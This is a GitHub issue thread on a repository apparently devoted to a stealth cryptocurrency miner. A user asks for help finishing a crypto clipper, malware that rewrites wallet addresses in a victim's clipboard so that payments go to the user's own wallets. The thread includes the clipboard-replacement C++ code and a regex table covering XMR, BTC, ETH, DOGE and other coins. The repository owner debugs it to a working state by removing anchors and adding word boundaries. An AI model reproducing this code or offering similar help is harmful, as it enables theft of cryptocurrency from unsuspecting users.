### ISSUE TITLE
just a small question

### ISSUE THREAD

**Issue by shainodev** [UnamSanctam/SilentCryptoMiner#1294]
under your donation thing, why is the eth address and link address the same?

**Comment by UnamSanctam** [comment]
Because it's a token (on the ETH network in this case), Chainlink does not have its own blockchain but is a token on the ETH blockchain (any other smart contract chains).

**Comment by shainodev** [comment]
> Because it's a token (on the ETH network in this case), Chainlink does not have its own blockchain but is a token on the ETH blockchain (any other smart contract chains).

ohhhh alrightt now i see. also if you would send etc to a eth address would it work or no? since im trying to make a clipper but as the etc and eth regex is the same i cant really do anything

**Comment by shainodev** [comment]
oh okay thank you very mcuh

**Comment by shainodev** [comment]
actually another question do you know how i could make it so my clipper reads every line or every "word" after space?

> string newClipboard = *clipboard;
> 			for (auto& coin : coins) {
> 				// Ignore empty addresses
> 				if (coin.second.empty())
> 					continue;
> 
> 				newClipboard = regex_replace(newClipboard, coin.first, coin.second);
> 				// Only replace one address, ensures we don't fuck up
> 				if (newClipboard != *clipboard) {
> 					// Update clipboard data
> 					auto glob = GlobalAlloc(GMEM_FIXED, newClipboard.length() + 1);
> 					if (glob) {
> 						memcpy(glob, newClipboard.c_str(), newClipboard.length() + 1);
> 						EmptyClipboard();
> 						SetClipboardData(CF_TEXT, glob);
> 					}
> 					break;
> 				}
> 			}

this is my current code

**Comment by UnamSanctam** [comment]
Why would you want to do that? Do you mean that you want to read everything after the first space or do you want to split the string into an array with the space as the delimiter?

**Comment by shainodev** [comment]
> Why would you want to do that? Do you mean that you want to read everything after the first space or do you want to split the string into an array with the space as the delimiter?

I want to do that so when people say for example "this is my address ADDRESS" then it replaces the address with mine aswell. i want to split it into an array so i can check every string in the array if it matches with the regex

**Comment by UnamSanctam** [comment]
The regex replace will already do that, if you do the regex correctly then it will just replace the wallet address with yours and return "this is my address REPLACEDADDRESS".

**Comment by shainodev** [comment]
> The regex replace will already do that, if you do the regex correctly then it will just replace the wallet address with yours and return "this is my address REPLACEDADDRESS".

but it doesnt do that i tried.

**Comment by shainodev** [comment]
ohh did u mean by regex correctly that i put something like [A-z] or something to the start of the regex and then the xmr address regex thing? or i dont get it

**Comment by UnamSanctam** [comment]
Yes then your regex is wrong, you're probably only checking if the entire string from the beginning is the wallet address.

**Comment by shainodev** [comment]
how do i make it check everything tho then?

**Comment by shainodev** [comment]
```
vector<pair<regex, string>> coins = {
	{regex(X("^[48][0-9AB][1-9A-HJ-NP-Za-km-z]{93}$")), X(XMR_ADDRESS)},			   // xmr
	{regex(X("^D{1}[5-9A-HJ-NP-U]{1}[1-9A-HJ-NP-Za-km-z]{32}$")), X(DOGE_ADDRESS)},	   // doge
	{regex(X("^((bitcoincash|bchreg|bchtest):)?(q|p)[a-z0-9]{41}$")), X(BCH_ADDRESS)}, // bch
	{regex(X("^(bc1|[13])[a-zA-HJ-NP-Z0-9]{25,39}$")), X(BTC_ADDRESS)},				   // btc
	{regex(X("^[LM3][a-km-zA-HJ-NP-Z1-9]{26,33}$")), X(LTC_ADDRESS)},				   // ltc
	{regex(X("^0x[a-fA-F0-9]{40}$")), X(ETH_ADDRESS)},								   // eth
	{regex(X("^X[1-9A-HJ-NP-Za-km-z]{33}$")), X(DASH_ADDRESS)}						   // dash
};
```
this is what i currently have

**Comment by UnamSanctam** [comment]
`^` means the start of the string and `$` means the end of the string. Try removing both the first `^` and the last `$` and test that.

**Comment by shainodev** [comment]
> `^` means the start of the string and `$` means the end of the string. Try removing both the first `^` and the last `$` and test that.

ohh thank you it worked but now i have a problem, i tried copying your whole donation section and now it puts it to

```
Donate
XMR: xmr

BTC: btc

ETH: 0x40E5bB6C6btc

ETC: 0xd5btc

RVN: RFsUdiQJbtc

LINK: 0x40E5bB6C6btc

DOGE: doge

LTC: ltc
```

how could i prevent this?

**Comment by UnamSanctam** [comment]
Well, what is XMR_ADDRESS, DOGE_ADDRESS and the others set to?

**Comment by shainodev** [comment]
> Well, what is XMR_ADDRESS, DOGE_ADDRESS and the others set to?

the coin name but i meant the 0x40E5bB6C6btc one, i have the eth regex but it still gets replaced by the btc regex one and i have no idea how i could prevent this from happening

**Comment by UnamSanctam** [comment]
Ah, maybe you can add `\b` in front and after it (all of the regexes I guess), that would only match it if it's a full "word".

**Comment by shainodev** [comment]
hmm im stuck at making the string raw, it doesnt let me use R since the string is more than 16 characters.

**Comment by UnamSanctam** [comment]
Are you just trying to escape the backslash? Then you can just escape it like normal instead:
`\\b(bc1|[13])[a-zA-HJ-NP-Z0-9]{25,39}\\b`

**Comment by shainodev** [comment]
> Are you just trying to escape the backslash? Then you can just escape it like normal instead: `\\b(bc1|[13])[a-zA-HJ-NP-Z0-9]{25,39}\\b`

ohhhhhhh yes thank you

**Comment by shainodev** [comment]
it works now thank you very much
